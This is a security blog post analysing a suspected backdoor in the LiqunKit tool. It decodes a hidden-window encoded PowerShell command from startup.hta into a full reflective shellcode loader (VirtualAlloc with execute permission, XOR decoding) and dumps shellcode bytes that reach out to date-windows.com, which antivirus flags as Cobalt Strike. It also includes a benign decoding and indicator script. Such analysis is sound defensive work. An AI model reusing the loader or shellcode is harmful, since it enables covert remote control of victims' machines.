微慑信息网

A PowerShell decoding exercise (they say the LiqunKit module/plugin has a backdoor?) - vulsee.com

Background

Out of nowhere, screenshots of LiqunKit being flagged as a virus got posted in the group chat, and then people started talking about a backdoor, abnormal traffic and all that..

Coincidentally, I had seen this tool on T00ls just a second earlier.

Project URL: https://github.com/Liqunkit/LiqunKit_

———————————————————————————————–

A backdoor didn't seem very plausible, and the screenshots in the group were all just of the files being uploaded to ThreatBook (微步) and VirusTotal for scanning.

Those prove nothing; it felt like people were talking off the top of their heads. The developer ships exploitation modules for Redis and the like, and aren't hacking tools like this always getting flagged by AV anyway?

Here is the file listing:

Apart from the module the author provides for Redis, everything else is plain text.. yet a crowd of people claim the tool has a backdoor, pointing for example at

startup.hta

Opening it shows the following:

<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -encodedcommand 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");</SCRIPT>

Someone ranted about:

 -nop -w hidden -encodedcommand 

I figured: just decode the thing and you'll know, won't you? And if you claim someone's tool has a backdoor, what use is muttering about ThreatBook/VT results? Then again, what if there actually is one?

Getting started

Original:

<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run("powershell -nop -w hidden -encodedcommand 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");</SCRIPT>

JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABhADQAKwBpAFMAaAByACsAMwBQADQASwBQAG4AUwBpAFIAcgBzAGIAQgBHADIAZAB6AFMAUQBIAEYAQgBRAEYAVgBQAEMAQwA5AHUAbAAwAHUASgBTAEkASQByAGMAcQBWAEQAZwB6AC8ALwAwAFUAcQBIADEANgBkAG4AcAAyAEoAOQBrADEASQBWAFkAVgA3AC8AVgA1AEwALwBXAGkAQQBmAFMAZwBvAGQAaQAxAGsAQgB6AFkAZwBIAGgAWQBnAEIAaQA2AGcAVQA4ADAAUwBxAFgANwBYAGkAQQBpADQAaQB2AHgAUgA3AG0AMABTAFgAdwBMADUAYwBmADUANABzADAAQgA2AEMAMgBNAEEAKwB2AE4AcwBPADAAWQBRAEUAagA4AFYAYgBxAGIARwBMAEYAeABJAEMAcgAzAFIAeQBOACsATwB3AFIAMgA0AG8ARQA2AFUAVwB4AHkAUQBtAEEAbgBNAGEAagBlADMAWgBYAHUAaQBxAFAARQBoADgAWQBHAHYAUABrAEcAYwBvAC8AZwA3AFEARABRAE4AcgBBAGgAVgBsAFIANQBZAGMATwB3AEYAeAB3AE0AMQAzAC8AOQA4AHEAVwBiAHgARABIAHcAMABXAFgALwAyAEEAZQBJAGgAUgBBAGMAVABNADgARgBzAEYASQBsAHYAaABIAEwATABZAGoAQgB3ADkAagBjAEEAUQBzAFIAZgB4AEgAMwBiADQAOQA5AEwAegBBAE4ANwAwAHEAVwBkAGcAMQByAGkAeAAxAGkAZgBUAHQALwBKAHcAVwBXAGsAWAB2AHcAcQBJAFcAZQBpAHkAcgBsAFAALwA4AHMAVgAxADgAZQBxAE4AZABIAFAAawBvAE0ARAAxAGIASwBXAGcAbwBSAE8ARAB6AGEAbgBsAGUAdQBFAHQAKwByAHUAYwBKAFoARwBvAEoASwBXAFgAYQB0AE8ASQBEAEIAQgBqADAAdQBYAFoAOQB1AFAATQA0AEwANgA1AFgAQwBlAFAAbABpAGUANwBsADYAOQBjAHcASgBEAGUAegBIAHIANQAzAE0AcABWADUANABLAG0AVwA4AG4ARwBCAHMAMgBBAHUARwA1AFQAcgB4AGsAdQB0ADcAZQBYADAAbAAvAG4AaQAzAFIAawAxADgANQBCADcAQQBvACsAZwBqAEUAQQBlAGgAQgB1AEsAagBhAHcASAA0AE8ARABCADgAMgB3AE0AcQAyAEcAQwAyAE0AcwBUAGgAOAA1ADEAeQBGAFIAcwBSAEEANQBUAEUAUABuAEcAegBCAGYATQBkAGcAegAyAG8AMwBQAHUASgA1ADkAVwB4ADMASgBmAGYAbABmAHQAYQBVAGMARABwAEIAdQA3AHYATQBsAFUAKwBNAG0ARwBxAEMAWQBxAHIAOQBXAHQATwAvAEEANABjAGMAcABFADMARgAzAEgAWQBuAFoAKwBzAC8ANQBCAGMAVgBmAHoANwBLAGMARwBxAHAAZQArAGwAVAAxAEwAVgBCAGgANQB3AEQAQQBUAGUARQBNAGIAMwBRADYANgBXADcAdQA1AGUAaQBpAFgAQQAvAGwAUQBtAEEAWABRAEwAdgBxADgARQBXAFMAZABrAGIASQBTAEIAZwBqAGoATgB3AHoAbQBMAEUAMQBCADkALwBTAGMAKwBGADcAVQAzAFQAbABqAC8AcABTAEQAcQB4AG4AWABsAHUAWQBUAG4AWQBzAGQAWAA0AG0AVQBSAHUAUABaAHIANgBhADUAYQB1AG0A
WgBQAGYAdgA1AG0ASgBxADUAbgBnAHoAaAAvAC8AKwB0AHEANgBJAEcATgA2ADQATgBlADYAaABzAEgAMQA3AG8AbABmAE8AVwB6AG0ASQBHAE4AQgB3AG8AOABIAG0AOQBrAEMAcgBhAHoAVQByADYAKwBBAEgAYgB2AGkAawA0ADUAQgAvAFQAbABaAHoAYgArADQASwBKADMAWAB1ADUAaQBIAEcAdgBoAHUARQBOAHMARgBVADYASgA2AG8ALwBHAFgARwBKAFkASwBZAHUAKwBEAEEANABZAHYAOABzAGUAcAArAG4AOQBCAHAAYwBaAHUARgBGAGYAUwB5AHUAOQBhAGMALwAzAGUAUwA1ADMAUABRAFAAQwBPAGoARgBKAGMASgAxAGIAZABVAEkARABoAGcAZgBzAE8AcwBIADYAMABMADIAKwBZAGgATQBVAEYATQB2AHkAUAArAGIASwBpAFkAZABjAHkANABEAG8ASgB1ADYAMQArAGcAbQBrAFYAOQBYAGQAdwBNAGMAVgBrADEAZwA0AHUAaABpAEcAbQBSAFkAQwB5AHoAVwA4AEgASgBVADYATQBYAEIAdAB3AEsAVwBhADYAOQB4AE0ASwBIACsASwBTAGQAZgB3AFAARgB4AHkAVwBOAEkAUgB4AHcAUwBmADUARgBoAG8ASwBNACsAWgAyAEsANwAvAGUAMwA1AFUASAB6AFcAQQB4AEUAUABvAGcAUQBPAG0ATAByAHEAUQA0AEIAawBPADcAagBuAFgAaQBpAHIAUwB6AFgAQwBBAFgAZgA0AFAAWgB0AC8AcQA1AEYASQBVAE8AVgBZADMAawBEADQAWQBqAFIATgBBADgAdwBKAFUASgB4AFoAdQBqAEgAQgBmAEsAOQBkAC8AUwByAHoALwB6AGIAdwBmAFcAOAB3AFAAWgBuAFoAagBjAEEAMQBrAHAAUwBqAEUARgB5ADUARgBlAGIAawBVAGwARgBaACsAdQBYAHgAOQB4ADcASgBBAEwAawBZAFkATgBTAEUATwBEAHAAdwBCAFEAWQB2AFIAaQBqAFoAVwBLAGQAUAB0AEoAQgBKAFQAZQBUAGQAdAB4AFgAMwArAEsAQQB5AGkAQQBUAC8ARAB6AHgARQAvAGQAQwBUAHcAawBqAFIAVQBRADAANgBWAEwARAA0AFoAVAB3AGIAawBjAEMATgBPADIAegAwAG0ATwBTAFYAaQBNAHUATgBJAFcAaQBBAHgAWABSAGIAMQArAFkAMQA0AEgAQQBjAHIASwBqAGsAdwBsAEIAMgBLAFIAdwBXAGYAdwBlAGQAbwBBAEgAdgBpAHMAYwBjAE8ARwBsAEUAZwB0AEIAeQAzAGMANQBWAHoANABaACsAYQBKADgAcgBVAFIAZQBIAFoANwBBAHYATQBZAEEARwBGAG4ASAA0AGcASABqAGsAaAA2AG4AWQBDAHYASAA0AFMAagA5ADEAZwBpAFAAbgBhAHIAZABEAG4AVABqAFkARAArAEcARQBMADYASgBKADEAbwBsAEUAYgBHAE0ANAA1AEgAUwAxAHEARwBrAG4AMQBGADYAawBpAEwAZgBoAFEAMABYAHgAYgBNAHEAbQBwAE0ARgBTAHkAUgBvAHAAOQB3AG4ANQBwADkARQBBAGwAYgBmAHgAbwBaADQAOQBhAEIAagBPAHIAQQA2AE4AQgA3AGkALwBnAHAATQBqAHkAaAAwAE4AeABNAEUAeQAxAHAAdQBPAEsAcQBYAEsAeQBTAEUAUgBHAGMAZQBiAFIAawAzAFcAVwBSAG0AMwBNAHIAegBBAFkAawA3AE8AVwB5AGkAcgBUAHMAcwArAFcATABwAHcAcwBYAFoASABTAHcAVQByAHAAWQB4ADEAUgBzAG4AUwBZAGcAUwBJAEYAWgAzAFkAbgB0AHUASwBlAHAAdABtAFoATgBqAHQAVABHAHIAWAAyAGoAbwBaAHUA
ZABmAHgAVABvAFYAKwB6AHoAeQBkADcARABzAGYARABHAFYAcgBSAEUAKwBQAEEAcABLAG4AZgAwAHMAUwBkAGUASgBhAHMARQBDADMAMABZAFMAcwAyADAAbQA0AG8AdQBjAEQAawBOAGkAaQBYAE8ANQBUAFcAegByAEQARAA0AHoAVwBQAHoAcQBTAG0AcQBhAG0ATgA5AFgAcQBEAFcAVwArAEUAOQBmAHAAZABXAGMAWQArAEcARQAxAGgAdABRAGYAMABaAEwAUgBVAE0AbwB2AG0ASgBDAHUATgBSAGUAegBIAFoATgBSAHkAcwBlAHcAMgBrAG0AbAA4ADMAdQBQAEQANQBwAFMAYgA3ADgANgBkAEoAMQBkACsAVQBqAGYAVABHAFkAdwBhAFUAUABUAE0AbABJAFYAegBhAEcAYwBqAFgAeAArAFAATgBsAHYAUwBiAGIAQwByAGcAOQBaAGcAZAAxAFQAagBLAEEAMAAyAGoAVgBUAHIAUABEAEYAcwB1AHkAOAAxAFoAcABuAEMAbgBrAGkAKwB4AGcAZgBjAEUAKwBPAFAAcgBYADMAQQBEADcATgBhAEoAbgBxAGkAeQBZADgASABzADUAcQBtAG0AcABBADIAbABWAFIAcAB6AFAAbQAxADIAagBzAE0AZQBYAFYAUAA2AGYAMgBwAGsAbQBoADcAVABwADAASgBuAEsAdwB1AHIASgA2AHAAMgB4AGwATAB6AFgAdQA4AFEAOAA0AGsAZAA3ACsATAB0AHkAQgAwADEAcgBJAHAAMQBPAGIARABuAG4AcQBhADYAbABMAGsATQB1AEgAegA1AHIAbQBOAGsAcABUAFYANAAzAFEATgBtAFUAbgBqADAAQQBzAFcAMgA2ADEAagBRAGoASgBPAHkAYwA2AHEAMgAxAHkAcgAvAEoASABlAFIARABKAE4ARAB1AEoAcwBEAFkAUgAxAEcAdwBnADkAMABzAGkAQwByAE4AbgBhAGEAdwAyAFMATgBvADkAYQA2AEUAUwBRADkAZQB5AFcAVAA2AGwAVQBrADYAbABSADAAQgBnAHoAMgBWAEIATAAwAGoARgA3AG0AdABOAG4AUgBWAHYAZwBDAFkATQB6AHEASQBUAFMAWABHAFUASgBaAGoANABjAHoAeQBkAHIATgBlAFgAOQAzAGwASgBSAFYAMABkADYAdwBTAFMAOAA2AE8AdQByADgAYQBZAFIANgBtAEUAcgB6AE4AYgB5AGYARABMAHYAWgBNAHEAQwBhAGUAagBKAGcAVgBwADQAYQBEAHQAcQByAGoAZQBuAFIAUwBnAEoAeAB2AE0AegAzADIAeQB6AEoAMQA3AGIANgAzADEAaABJADQAdgBNAFgAbwBlAEwAcABYAGkAeQAzAEIASABaADcAbgBJAFIAcgA2AHcANAAwACsAZQBNAFoATgBoAFEAbABhAG4AVwBGAEcAVAA1AGsASQBZAHMAdABKAHEAVQAxADUASgAxAGEAZgBqAHMAUwBYADUAMwBlAGUAUwAwAFQAdgBiAEUAeQB5AGsAdwBuAGIATwAwADAAMwBWADIATQBLAEsARgAvAHYATwBTADkATwBiAFQAYwBCAGUAUgBvAHoANQBuAHkAZwB0AHYASwArADIAMwBwADgAawBUAHMAMQBMAE8AeQAyAG0AUQBIAGEAWABGAG8AcQBVAHcAYQBDAFEAdgA1AFcAQgBXAFcAOABsAEsATABXADEATwBCAE0AdABKAFUAawBwADIAMgBaADMAVwBHAFMAOABkAEgAZQBmAGkAMwB0AHYAaABQAE0ANQB3AFQAawB2ADQAMgBZAG0AMABLAGcASABHAFAAcAAxAHgAagBzAEYAaABrAE4AZgBLAFQAagB5AEcAcQBUAFcASwBlAFoAdQBIAE8AeABiAHYAcgBjAEYAQwBrAHMAMQBsAGQATABLAHoAUgBwAGcAbwBlAHQA
TgB3ADkAbQBMAFMAeABUAFYAdQA5AGsARwB0AEoAMABYAG8AMgBhAEkARgBlAHoAVABiAHIAeABTAFYASABPAHEAcQAwADUAeAByAGUAMgBvAHcARQA5AFIAcABiADgANwBKAE0AMQBjACsAQwAvAFQAQwB6AEQAdgBaAEoAbwBqAHgAYgBIAEwATwA3AC8AdAAvAEUAZgBqAC8AdwBVAFAARQBlADYALwBDAEgAUQBvADMAdgAvAHkAOABWAHEAdgBtAE0AOABQADcAbQA1AGYANwA4ACsAdAB0AHgAbgB2AGYAUAA1AGgAbgBMAEkAMQB1ADUAbgAyAHYAZQBIAE0AMABQAG4AUwA3AFgAdwAxAE8AcwBoAEgARAByAGUASABoAEwAbwBpAEgAbgA5AHYAVgBKAFEAUwB4AGMAQgAxAGgASgBvAEcAYgBjADEAUQBxAG4AMAAvAGQAZQB4AEQANwB3AE0ATQBUAEsAWgA1AFoAYgB3ADIAZgA5AGIAegBBAHkAbwBlAHUAWAAwAHcALwBlAEEAUwA4AEQARwBhAHYAKwBHAEsAYgA0AHkAWABkACsASABSAFYASgBkADQASgA4AGEAUgAxADgAYwBsAE0ATgBwAHQAaQBNAEwAbAA2AGUASgB2AFAAYgBvAFIAZgB2AHEAeQB4AGUALwBVAFAASQBFAHIAQQBkADkAQwAyAFQAcABCAG4AbQBpAFQASgAvAEoAOABoAHEANgBYAGYAaAA2AFUAYgBoAEcAbgBsAFgAVgB3ADkASAA4AHcAKwBXAFAASgBSAGsAMQBkAG8AcQBsADcAUgBqAHgAUAAvAEEAUAA2AFAAQQBmAGgAQgA2AFgAKwBIAE4AZwBlAHYAbQBPADMAZQBvAFMAcwBNACsAaAB5AHYAYQBxAG4AOABSADYAawBrAGIAbwBnAFAANQA5AEQATgA4AEoAYwBMAGkASQBoADIAawBYAHMAUQBHAFQARgA2ADIAQQBVAG0ALwBzAHcAcAA3AHUAMwBLAHYAVgBFAGwAUgBGADQAbgA3AGcAMwBpAE8ALwBHAEEAMwBXAE0AaAAzAGMARABmAE8AcgBHAFQANQBKAGMANABjAGYAbAAwACsAMABhAGMARABQAGYAQwArAEkAMQBRAGcAUQBYAHcANgBQADAAdwBEAEUAeQBjAHAAUQBEAFAAWQByAG4AbwBRAGsAaABPAGoATQAvACsAQgBqAFcANQBTAG8AbwBMAEQAZwBBAEEAIgApACkAOwBJAEUAWAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAkAHMALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA

Base64 decode (the -encodedcommand argument is UTF-16LE text):

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

Base64-decode the inner string as well:

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

The result looks like gibberish at first glance; reading further along the command:

New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress)

Gzip compression is involved. Use a script to write the inner blob out as a sample file for decompression:

import base64

# inner base64 string taken from the FromBase64String(...) argument in the decoded command
code2 = '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'
# the inner payload is raw gzip bytes, not UTF-16 text, so it must not be decoded as a string
code2ed = base64.b64decode(code2)
with open("decoded.gzip", 'wb') as f:
    f.write(code2ed)

Decompress that Gzip:

This yields the file decoded:

Set-StrictMode -Version 2

$DoIt = @'
function func_get_proc_address {
	Param ($var_module, $var_procedure)		
	$var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
	$var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string'))
	return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure))
}

function func_get_delegate_type {
	Param (
		[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,
		[Parameter(Position = 1)] [Type] $var_return_type = [Void]
	)

	$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
	$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed')
	$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed')

	return $var_type_builder.CreateType()
}

[Byte[]]$var_code = [System.Convert]::FromBase64String('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')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}

$var_va = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll VirtualAlloc), (func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))
$var_buffer = $var_va.Invoke([IntPtr]::Zero, $var_code.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length)

$var_runme = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($var_buffer, (func_get_delegate_type @([IntPtr]) ([Void])))
$var_runme.Invoke([IntPtr]::Zero)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}

Another string appears:

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

It can be processed in PowerShell:

[Byte[]]$var_code = [System.Convert]::FromBase64String('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')

for ($x = 0; $x -lt $var_code.Count; $x++) {
	$var_code[$x] = $var_code[$x] -bxor 35
}


After the XOR:

Convert the decimal values to hex and write them out as raw bytes:

import binascii

# the XOR-decoded bytes as PowerShell printed them: decimal values separated by spaces
content = ("252 232 137 0 0 0 96 137 229 49 210 100 139 82 48 139 82 12 139 82 20 139 114 40 15 183 74 38 49 255 49 192 172 60 97 124 2 44 32 193 207 13 1 199 226 240 82 87 139 82 16 139 66 60 1 208 139 64 120 133 192 116 74 1 208 80 139 72 24 139 88 32 1 211 227 60 73 139 52 139 1 214 49 255 49 192 172 193 207 13 1 199 56 224 117 244 3 125 248 59 125 36 117 226 88 139 88 36 1 211 102 139 12 75 139 88 28 1 211 139 4 139 1 208 137 68 36 36 91 91 97 89 90 81 255 224 88 95 90 139 18 235 134 93 104 110 101 116 0 104 119 105 110 105 84 104 76 119 38 7 255 213 232 0 0 0 0 49 255 87 87 87 87 87 104 58 86 121 167 255 213 233 164 0 0 0 91 49 201 81 81 106 3 81 81 104 187 1 0 0 83 80 104 87 137 159 198 255 213 80 233 140 0 0 0 91 49 210 82 104 0 50 192 132 82 82 82 83 82 80 104 235 85 46 59 255 213 137 198 131 195 80 104 128 51 0 0 137 224 106 4 80 106 31 86 104 117 70 158 134 255 213 95 49 255 87 87 106 255 83 86 104 45 6 24 123 255 213 133 192 15 132 202 1 0 0 49 255 133 246 116 4 137 249 235 9 104 170 197 226 93 255 213 137 193 104 69 33 94 49 255 213 49 255 87 106 7 81 86 80 104 183 87 224 11 255 213 191 0 47 0 0 57 199 117 7 88 80 233 123 255 255 255 49 255 233 145 1 0 0 233 201 1 0 0 232 111 255 255 255 47 105 90 99 54 0 228 252 193 16 215 124 98 24 9 249 225 6 76 3 15 113 228 80 9 86 237 10 219 87 168 67 59 186 14 163 172 126 140 15 84 213 234 12 92 195 44 37 12 71 208 23 47 23 48 194 11 36 221 4 26 234 11 51 191 221 239 170 107 79 96 164 108 199 178 77 238 248 20 0 85 115 101 114 45 65 103 101 110 116 58 32 77 105 99 114 111 115 111 102 116 32 78 84 80 32 118 32 49 46 48 13 10 0 141 52 138 162 176 56 52 198 42 46 63 51 127 153 129 193 189 252 204 232 77 235 38 200 234 184 27 28 74 160 130 123 66 162 152 23 140 14 30 67 13 122 103 104 212 93 128 20 243 89 208 70 194 122 210 194 96 242 143 203 236 189 135 104 78 20 77 215 138 161 136 35 182 253 132 246 62 90 192 206 79 75 205 16 6 8 145 27 47 55 252 48 113 117 153 15 38 142 77 246 11 174 122 199 196 147 198 44 70 63 167 "
           "191 22 174 102 168 212 116 168 167 1 86 251 26 222 138 125 189 138 238 176 55 30 108 80 22 125 21 125 202 150 117 120 66 8 181 124 226 121 104 54 141 216 48 188 35 227 103 135 127 66 124 19 173 7 125 230 117 0 36 1 8 108 33 37 130 46 67 53 196 38 136 170 250 48 115 104 178 111 17 79 138 33 228 26 245 125 175 127 145 88 183 154 225 121 211 113 212 28 231 16 4 184 160 49 192 126 83 36 8 82 101 206 78 6 114 41 64 136 97 165 38 144 54 181 49 199 164 32 220 194 160 82 122 41 16 159 150 118 203 253 14 11 230 175 130 28 187 19 252 145 199 210 127 161 207 150 17 3 0 104 240 181 162 86 255 213 106 64 104 0 16 0 0 104 0 0 64 0 87 104 88 164 83 229 255 213 147 185 0 0 0 0 1 217 81 83 137 231 87 104 0 32 0 0 83 86 104 18 150 137 226 255 213 133 192 116 198 139 7 1 195 133 192 117 229 88 195 232 137 253 255 255 116 105 109 101 46 100 97 116 101 45 119 105 110 100 111 119 115 46 99 111 109 0 18 52 86 120")

dec_values = content.split()   # split() also drops the trailing blank that split(' ') would leave behind
# hex_bytes = bytes.fromhex(content)   # not applicable: the dump is decimal, not hex
pe_list = []
for dec_value in dec_values:
    # each decimal byte value becomes two hex digits
    pe_list.append('%02x' % int(dec_value, 10))

pe_str = "".join(pe_list)
content = binascii.a2b_hex(pe_str)
with open("ps_shellcode", 'wb') as pe_file:
    pe_file.write(content)
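To tie the steps above together, here is an added Python example of my own (not the author's scripts and nothing from the LiqunKit project) that peels the same layers in one pass: the UTF-16LE base64 behind -encodedcommand, the inner FromBase64String blob, the gzip stream, the second base64 string and the single-byte -bxor loop. Because the real blobs on this page are elided, the block first builds a constructed stand-in with the same layering (the final stage is a harmless marker string, not shellcode; host.example.invalid is a placeholder hostname; all function names are mine) and then decodes it, runs a minimal strings pass over the result, converts a decimal byte dump straight to bytes (the hex round-trip above is not needed), and checks the decoded stages against the static indicators this stager pattern shows: hidden window plus encoded command, gzip/IEX wrapper, GetProcAddress via UnsafeNativeMethods, VirtualAlloc with 0x40, the XOR loop and -RunAs32. Standard library only.

```python
import base64
import gzip
import re
import string

XOR_KEY = 35  # the key used by the -bxor loop in the decoded stager above
# Constructed stand-in for the final stage: the real sample carries shellcode,
# this carries a harmless marker string so the example runs safely offline.
INNER_PLAINTEXT = b"CONSTRUCTED-PAYLOAD host.example.invalid"

# Static indicators of this stager pattern, checked over the decoded stage texts.
INDICATORS = {
    "hidden-window encoded command": r"-w(?:indowstyle)?\s+hidden\s+-e(?:ncodedcommand)?",
    "gzip + base64 + IEX wrapper": r"GzipStream.*?Decompress.*?ReadToEnd",
    "GetProcAddress via UnsafeNativeMethods": r"Microsoft\.Win32\.UnsafeNativeMethods",
    "VirtualAlloc with PAGE_EXECUTE_READWRITE (0x40)": r"VirtualAlloc.*?0x3000,\s*0x40",
    "single-byte XOR decode loop": r"-bxor\s+\d+",
    "forced 32-bit job (-RunAs32)": r"-RunAs32",
}

def build_constructed_sample(inner: bytes, key: int = XOR_KEY) -> str:
    """Wrap `inner` in the same layering the post walks through so the decoder
    has realistic input: XOR -> base64 -> stager text -> gzip -> base64 ->
    wrapper -> UTF-16LE base64 -> -encodedcommand inside an HTA."""
    xored = bytes(b ^ key for b in inner)
    stager = (
        "[Byte[]]$var_code = [System.Convert]::FromBase64String('%s')\n"
        "for ($x = 0; $x -lt $var_code.Count; $x++) {\n"
        "\t$var_code[$x] = $var_code[$x] -bxor %d\n}\n"
        % (base64.b64encode(xored).decode(), key)
    )
    gz_b64 = base64.b64encode(gzip.compress(stager.encode())).decode()
    wrapper = (
        '$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("%s"));'
        "IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,"
        "[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();" % gz_b64
    )
    encoded = base64.b64encode(wrapper.encode("utf-16-le")).decode()
    return ('<SCRIPT Language="JScript">new ActiveXObject("WScript.Shell").run('
            '"powershell -nop -w hidden -encodedcommand %s");</SCRIPT>' % encoded)

def decode_layers(hta_text: str) -> dict:
    """Peel the layers off an HTA like the one above; returns every stage."""
    b64 = r"[\"']([A-Za-z0-9+/=]+)[\"']"
    m = re.search(r"-encodedcommand\s+([A-Za-z0-9+/=]+)", hta_text, re.I)
    if not m:
        raise ValueError("no -encodedcommand argument found")
    # -encodedcommand is base64 over UTF-16LE text, hence the A.B.C. look when decoded naively
    wrapper = base64.b64decode(m.group(1)).decode("utf-16-le")
    m = re.search(r"FromBase64String\(\s*" + b64, wrapper)
    if not m:
        raise ValueError("wrapper has no FromBase64String payload")
    blob = base64.b64decode(m.group(1))
    # gzip magic 1f 8b: the "gibberish" is a compressed stream, not text
    if blob[:2] == b"\x1f\x8b":
        blob = gzip.decompress(blob)
    stager = blob.decode("utf-8", "replace")
    m = re.search(r"FromBase64String\(\s*" + b64, stager)
    k = re.search(r"-bxor\s+(\d+)", stager)
    if not m or not k:
        raise ValueError("stager has no base64 payload or XOR key")
    key = int(k.group(1))
    payload = bytes(b ^ key for b in base64.b64decode(m.group(1)))
    return {"wrapper": wrapper, "stager": stager, "xor_key": key, "payload": payload}

def printable_strings(data: bytes, min_len: int = 6) -> list:
    """Minimal 'strings': this is what surfaces a hostname or User-Agent in the final stage."""
    allowed = set(string.printable.encode()) - set(b"\t\n\r\x0b\x0c")
    out, cur = [], bytearray()
    for b in data + b"\x00":  # trailing sentinel flushes the last run
        if b in allowed:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            out.append(cur.decode())
        cur = bytearray()
    return out

def decimal_dump_to_bytes(dump: str) -> bytes:
    """The space-separated decimal dump PowerShell prints for a [Byte[]] goes straight to bytes."""
    return bytes(int(v) for v in dump.split())

def stager_indicators(*texts: str) -> list:
    """Names of INDICATORS matched anywhere in the given stage texts."""
    joined = "\n".join(texts)
    return [name for name, pat in INDICATORS.items() if re.search(pat, joined, re.I | re.S)]

if __name__ == "__main__":
    sample = build_constructed_sample(INNER_PLAINTEXT)
    stages = decode_layers(sample)
    print("XOR key:", stages["xor_key"])
    print("strings:", printable_strings(stages["payload"]))
    print("indicators:", stager_indicators(sample, stages["wrapper"], stages["stager"]))
```

On the real sample you would feed decode_layers the startup.hta text and then run printable_strings over stages["payload"]; that is the step that would have shown the domain the static analysis below found, without going through scdbg first. The indicator list is deliberately about the loader pattern, not about any hash or domain, so it keeps matching when only the final stage changes.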

This produces the shellcode:

Analysing it with scdbg.exe, the handy malicious-code analysis tool: I don't fully understand the output, but following the usual recipe I didn't see any obvious malicious traces:

Static analysis:

The domain involved, date-windows.com, is currently not registered:


For a laugh:

More to follow.

12-01 update: Yesterday, seeing the domain was unregistered, I figured this was probably a non-malicious file. I have just submitted the shellcode to ThreatBook (微步) to check its behaviour:

How the shellcode gets invoked and executed I don't yet understand; that still needs further study:

Running it through a shellcode loader, once the payload is loaded

the antivirus intercepts it and flags CS (Cobalt Strike):

(Suddenly I feel I'm not cut out for this line of work...)

So where did ok.exe come from... and what exactly did this shellcode do....
